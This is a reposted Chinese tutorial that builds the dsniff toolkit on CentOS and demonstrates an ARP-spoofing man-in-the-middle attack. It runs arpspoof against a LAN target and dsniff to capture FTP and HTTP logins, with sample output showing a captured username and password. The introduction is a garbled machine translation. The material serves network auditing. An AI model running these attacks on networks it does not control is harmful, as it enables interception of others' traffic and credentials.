开发者社区> 技术小阿哥> 正文
阿里云
为了无法计算的价值
打开APP
阿里云APP内打开

linux 实现嗅探工具dsniff

简介:
+关注继续查看

dsniff是一家集工具为网络审计和渗透测试dsniff,filesnarf,mailsnarf,msgsnarf,urlsnarf,webspy被动监测网络的数据(密码、电子邮件、文件等)。arpspoof,dnsspoof,macof方便截取网络流量通常不能攻击者(e。g,由于第2层交换)。sshmitm和webmitm实现主动的猴子在中间攻击重定向SSH和HTTPS会话利用弱绑定在特别的PKI。我写这些工具与诚实的意图——审计自己的网络,并证明了大多数网络应用协议不安全感。请不要滥用这种软件


实验环境

centos-5.5


使用软件

openssl-0.9.7i.tar.gz

libnids-1.18.tar.gz

libpcap-0.7.2.tar.gz

libnet-1.0.2a.tar.gz

db-4.7.25.tar.gz

dsniff-2.3.tar.gz


软件安装

yum install -y gcc gcc-c++ flex bison

tar zxvf openssl-0.9.7i.tar.gz

cd openssl-0.9.7l

./config

make

make install


tar zxvf libpcap-0.7.2.tar.gz

cd libpcap-0.7.2

./configure

make

make install


tar zxvf libnet-1.0.2a.tar.gz

cd Libnet-1.0.2a

./configure

make

make install


tar zxvf libnids-1.18.tar.gz

cd libnids-1.18

./configure

make

make install


tar zxvf db-4.7.25.tar.gz

cd db-4.7.25/build_unix

../dist/configure --enable-compat185

make

make install


tar zxvf dsniff-2.3.tar.gz

cd dsniff-2.3

vim arp.c


11 #include "config.h"

添加 #include "memory.h"


11 #include "config.h"

12 #include "memory.h"


./configure --enable-compat185 --with-db=/usr/local/BerkeleyDB.4.7

make

make install


设置

vim /etc/sysctl.conf


找到 net.ipv4.ip_forward = 0


修改 net.ipv4.ip_forward = 1


sysctl -p 修改生效,无需重启系统

cp -p /usr/local/BerkeleyDB.4.7/lib/libdb-4.7.so /usr/lib

cd /usr/local/sbin;ls 如果有dsniff,既为安装成功

到此为止dsniff,安装成功了。


使用方法

使用 arpspoof 对目标机实施ARP欺骗攻击

arpspoof -i eth0 -t 192.168.0.103 192.168.0.1 192.168.0.1 为伪装网关地址

0:c:29:2f:29:e3 0:c:29:e1:7c:52 0806 42: arp reply 192.168.0.1 is-at 0:c:29:2f:29:e3

0:c:29:2f:29:e3 0:c:29:e1:7c:52 0806 42: arp reply 192.168.0.1 is-at 0:c:29:2f:29:e3

0:c:29:2f:29:e3 0:c:29:e1:7c:52 0806 42: arp reply 192.168.0.1 is-at 0:c:29:2f:29:e3

0:c:29:2f:29:e3 0:c:29:e1:7c:52 0806 42: arp reply 192.168.0.1 is-at 0:c:29:2f:29:e3



使用 dsniff 取得指定端口的数据信息

dsniff -i eth0 -t 21/tcp=ftp,80/tcp=http

dsniff: listening on eth0

-----------------

08/06/13 10:12:35 tcp 192.168.0.103.3043 -> 192.168.0.102.21 (ftp)

USER anonymous

PASS IEUser@


dsniff这是一个口令嗅探器,可以处理的协议类型包括: 
FTP,Telnet,SMTP,HTTP,POP,NNTP,IMAP,SNMP,LDAP,Rlogin,RIP,OSP 
F,PPTP,MS-CHAP,NFS,VRRP,YP/NIS,SOCKS,X11,CVS,IRC,AIM,ICQ,Napster,ostgreSQL,
MeetingMaker,CitrixICA,Symantec,pcAnywhere,NA 
ISniffer,MicrosoftSMB,OracleQL*Net,Sybase及MicrosoftSQL认证信息




本文转自 mailfile 51CTO博客,原文链接:http://blog.51cto.com/mailfile/1327675,如需转载请自行联系原作者

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

相关文章
Linux下查找包含BOM头的文件和清除BOM头命令 2014-08-16 12:30:50
Linux下查找包含BOM头的文件和清除BOM头命令 2014-08-16 12:30:50 分类: 系统运维   查找包含BOM头的文件,命令如下: 点击(此处)折叠或打开 grep -r -I -l $'^\xEF\xBB\xBF' ./ \xef\xbb\xbf是UTF8 BOM的16进制表示   这个命令会把当前目录及所有子目录下的BOM头删除掉。
1097 0
Linux Screen命令使用
参考URL: http://jingyan.baidu.com/article/295430f128d8ea0c7e005089.html ~~~~~~~~~~~~~~~~~~~~~~~~ 其它的不提,主要用的几个命令: A,screen -S screenname B,在screen窗口...
634 0
Linux 查看磁盘分区、文件系统、使用情况的命令和相关工具介绍
磁盘分区表、文件系统的查看、统计的工具很多,有些工具是多功能的,不仅仅是查看磁盘的分区表,而且也能进行磁盘分区的操作;但在本文,我们只讲磁盘分区的查看,以及分区的使用情况的查看;本文只是给新手上路之用;关于分区工具的操作,我将在以后做专门介绍;此文目的:主要是向初学者介绍一下入门必备的一点基础知识,...
1059 0
linux fdisk命令使用
fdisk 对硬盘及分区的操作,进入fdisk 对硬盘操作阶段  我们可以对硬盘进行分区操作,前提是您把fdisk -l 弄明白了;通过fdisk -l ,我们能找出机器中所有硬盘个数及设备名称;比如上面的例子,我们会看到两个设备一个是/dev/hda ,另一个是/dev/sda ;  fdisk ...
859 0
[20121121]关于linux下history命令.txt
[20121121]关于linux下history命令.txt昨天跟别人聊天,提到linux下history命令带来的安全隐患,主要是一些命令会记录在~/.bash_history中。
670 0
【Linux命令使用】任务控制相关命令
作者:gnuhpc 出处:http://www.cnblogs.com/gnuhpc/ Linux/Unix 区别于微软平台最大的优点就是真正的多用户,多任务。因此在任务管理上也有别具特色的管理思想。
667 0
文章
问答
文章排行榜
最热
最新
相关电子书
更多
ECS系统指南之Linux系统诊断
立即下载
Decian GNU/Linux安全合规之路
立即下载
从 Linux 系统内核层面来解决实际问题的实战经验
立即下载